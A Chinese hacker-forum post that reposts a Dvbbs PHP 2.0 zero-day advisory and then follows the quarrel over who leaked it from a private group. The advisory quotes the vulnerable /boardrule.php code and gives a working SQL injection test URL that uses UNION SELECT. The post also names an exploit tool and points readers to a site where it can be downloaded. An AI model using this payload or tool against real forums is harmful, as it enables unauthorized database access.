由Dvbbs PHP 0day引发的争论
由Dvbbs PHP 0day引发的争论昨天刚刚得到Dvbbs PHP 0day 的资料,看来还是晚了,今天无意间发现了有趣的事情,所以就给大家贴出来。呵呵
漏洞给大家播报下
================================================================
Dvbbs PHP 0day
影响版本:2.0
漏洞文件:/boardrule.php
Author:sniperhg 小蟑螂
信息来源:零客网安 www.0kee.com
--------------------分割JJ----------------------
相关代码:
function brule() {
global $dv,$db,$boardid,$lang,$groupboardid;
$groupboardid=$_GET['groupboardid'];
if(!empty($_GET['groupboardid'])){
$rules=$db->scalar("select rules from {$dv}group_board where id={$groupboardid}");
}
else{
$rules=$db->scalar("select rules from {$dv}board where boardid={$boardid}");
}
直接获得变量groupboardid,不为空就直接带入查询导致注入。
测试:http://dvbbsroot/boardrule.php?groupboardid=111111111/**/union/**/select/**/version
()/*
利用工具 dvbbs_php2.0_fucker_.exeMD5 : 6b931f8e00e90cf4b1faa531a59d4b36
=========================================================================================
(应该是0DAY的发现者说的,还有可能是零客的老大 下称作者)题外话:这个0day作为内部信息我只在10号那天在群共享里发了。
之前sniperhg本打算在清明节时发出来,没想到今天下午无意中在鬼仔的blog里看到了这个。
http://www.huaidan.org/blog/article.asp?id=1767
文中除了把版权信息去掉了之外跟我在群里发的txt几乎一个字都不带差的。居然说是拣的。
东西发就发了,无所谓,也不是多好的东西。
但是就这件事,我非常不爽。
是谁泄露的,我早晚会查个水落石出。
论坛斑竹:
跟帖。。。
我X那个人。
鬼仔也不厚道~
鬼仔:
。。。。。。
不是我不厚道,我是没想那么多就发出来了。
不好意思。
作者:
说实话
一定得查查谁泄露的
和鬼仔没关系
感觉自己内部群里不应该出现会泄露信息的人
我一直很相信自己人的
现在也不例外
鬼仔:
关于把版权信息去掉的问题,是我确实不知道是你们这里的,我把你们版权信息加上了。
内部成员:
你还真会捡啊???/
鬼仔:
我已经道歉了,没必要这样了吧?
作者:
没意见
看看蟑螂有何意见和想法
游客:
不是内部泄露就是马化腾个J8@!
小蟑螂:
事都过去了。
但是我希望你能告诉是谁给你的。
OK的话就PM给我。不行就当我没说。
我不希望这个人是我群里的。
呵呵,如果能联想到一起,那么就更有趣了,最后总结一句话,什么事情就怕出内奸,
关于发布的ODAY工具,网上的大都不能用 大家可以到 http://www.520jsj.com上去下载,也可以到上面的官方去下载哦。
页:
[1]